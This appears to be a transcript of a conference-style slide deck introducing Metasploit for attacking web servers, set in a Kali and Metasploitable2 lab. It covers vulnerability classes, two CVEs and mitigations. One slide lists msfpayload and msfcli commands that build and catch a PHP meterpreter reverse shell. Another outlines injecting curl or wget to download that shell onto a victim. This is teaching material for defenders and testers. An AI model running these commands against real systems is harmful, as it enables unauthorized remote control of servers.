Introduction to metasploit exploiting web applications
This presentation is the property of its rightful owner.
Sponsored Links
1 / 29

Introduction to Metasploit: Exploiting Web Applications PowerPoint PPT Presentation


  • 132 Views
  • Uploaded on
  • Presentation posted in: General

Dennis Maldonado. @DennisMald. Introduction to Metasploit: Exploiting Web Applications. Dennis Maldonado. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus Computer Information Systems Major Twitter @DennisMald Website / Blog

Download Presentation

Introduction to Metasploit: Exploiting Web Applications

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Introduction to metasploit exploiting web applications

Dennis Maldonado

@DennisMald

Introduction to Metasploit:Exploiting Web Applications


Dennis maldonado

Dennis Maldonado

  • Application Security Specialist

    • WhiteHat Security

  • Full-Time Student

    • University of Houston – Main Campus

      • Computer Information Systems Major

  • Twitter

    • @DennisMald

  • Website / Blog

    • KernelMeltdown.org


Tools

Tools

  • Kali Linux – Our attacker machine

  • Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.

  • Metasploitable2 – Victim Web Server


Topic of the day

Topic of the day

Exploiting the backend server through a web application.


What s the problem

What’s the problem?

  • Reasons why hackers want to compromise the server:

    • Run attacks against the internal network

    • Use the server as a bot

    • Install backdoors onto the server

    • Reveal sensitive files/passwords

    • Execute any local file

    • Execute remote files

    • and more…


What s the problem1

What’s the problem?

  • Vulnerabilities that are dangerous against a server

    • Directory Traversal

    • Local File Inclusion

    • Remote File Inclusion

    • Remote Code Execution

    • SQL Injection

    • Command Injection


Directory traversal

Directory Traversal

http://website.com/?page=index.php


Local file inclusion

Local File Inclusion

http://website.com/?page=index.php


Remote file inclusion

Remote File Inclusion

http://website.com/?page=index.php


Remote code execution

Remote Code Execution

http://website.com/


Sql injection

SQL Injection

http://website.com/user.php?id=1&Submit=Submit#


Command injection

Command Injection


Metasploit basics

Metasploit Basics


The metasploit project

The Metasploit Project

  • Metasploit is an open-source framework used for Security development and testing

    • Information gathering and fingerprinting

    • Exploitation/Penetration testing

    • Payload generation and encoding

    • Fuzzing

    • And much more…


Metasploit interfaces

Metasploit Interfaces

  • Command Line Interfaces

    • msfconsole

    • msfcli

  • GUI Interfaces

    • Metasploit Community Edition

    • Armitage


Metasploit modules

Metasploit Modules

  • Modules

    • Exploit – Exploitation/Proof-of-Concept code

      • Ruby on Rails exploit

      • PHP-CGI exploit

    • Auxiliary – Misc. modules for multiple purposes

      • Scanners

      • DDOS tools

      • Fingerprinting

      • Clients

    • Payloads – Code to be executed on the exploited system

      • System Shells

      • Meterpreter Shells

    • Post – Modules for post-exploitation tasks

      • Persistence

      • Password Stealing

      • Pivoting


Exploits

Exploits

  • Active Exploits

    • Actively exploit a host.

    • Ex: Ruby on Rails XML exploit

  • Passive Exploits

    • Wait’s for incoming hosts, then exploits them

    • Ex: Java 0-days

  • Exploits contain payloads


Payloads

Payloads

  • Inline (Non Staged)

    • Payload containing the exploit and shell code

    • Stable

    • Large size

  • Staged

    • Exploits victim, establishes connection with attacker, pulls down the payload

  • Meterpreter

    • Advanced, dynamic payload.

    • Extended over the network

    • Extensible through modules and plugins


Payloads continued

Payloads continued

  • Types of connections

    • Bind

      • Local server gets started on victim machine

      • Attacker connects to victim

      • windows/x64/shell/bind_tcp

    • Reverse

      • Local server gets started on attacker machine

      • Victim connects to attacker

      • windows/x64/shell/reverse_tcp


Vulnerabilities and exploit examples

Vulnerabilities and Exploit Examples


Php cgi argument injection

PHP-CGI Argument Injection

  • CVE 2012-1823

  • DOS attack

    • -T 10000

  • Source code disclosure

    • -s argument

  • Remote Code Execution

    • -d argument


Ruby on rails xml parameter parsing vulnerability

Ruby on Rails XML Parameter Parsing Vulnerability

  • CVE-2013-0156

  • Easy to find, easy to exploit, critical vulnerability.

  • Requires just one POST request containing a specially crafted XML data.

  • Send commands through YAML objects


Unrestricted file upload

Unrestricted File Upload

  • The upload functionality allows for any file type to be uploaded

    • Upload server-side code and check if it executes

      • PHP = <?php echo “Hello World!”; ?>

      • ASP = <% Response.Write"Hello World!" %>

      • JSP = <%= new java.util.Date().toString() %>

    • Use msfpayload to create a shell

    • Use msfcli to listen for a connection from the victim

    • Upload the shell and execute it


Command injection1

Command Injection

  • Allows an attacker to execute system level commands.

    • Attempt a safe command

      • echo test

      • uname -a

    • Use msfpayload to create a shell

    • Use msfcli to listen for a connection from the victim

    • Inject curlor wgetcommands to download the shell onto the victim machine.

    • Chmod if necessary and execute


Commands used note ip addresses and ports may be different

Commands used(Note, IP addresses and ports may be different)

  • msfpayloadphp/meterpreter/reverse_tcp O

  • msfpayloadphp/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O

  • msfpayloadphp/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php

  • # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.

  • ==================================

  • msfcli multi/handler payload=php/meterpreter/reverse_tcplhost=10.211.55.3 lport=1337 E


Mitigations and closing

Mitigations and Closing


Mitigations

Mitigations

  • Keep software up to date!

    • PHP: 5.4.3, 5.3.13

    • Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15

  • Use whitelisting for file upload extensions

    • Watch for extensions and content-types

    • Don’t let upload directory be executable

    • Rename files if possible

  • Don’t pass user input as a system command!

    • Use library calls when possible

    • Sanitize input


Questions comments

Questions? Comments?


Sources

Sources

  • BackTrack-Linux

    • http://www.kali.org/

  • The Metasploit Project

    • http://www.metasploit.com/

  • Metasploit Unleashed

    • http://www.offensive-security.com/metasploit-unleashed/

  • PHP-CGI Advisory

    • http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

  • Ruby on Rails Exploitation

    • https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156

  • Damn Vulnerable Web Application (DVWA)

    • http://www.dvwa.co.uk/

  • Metasploitable 2

    • http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web


  • Login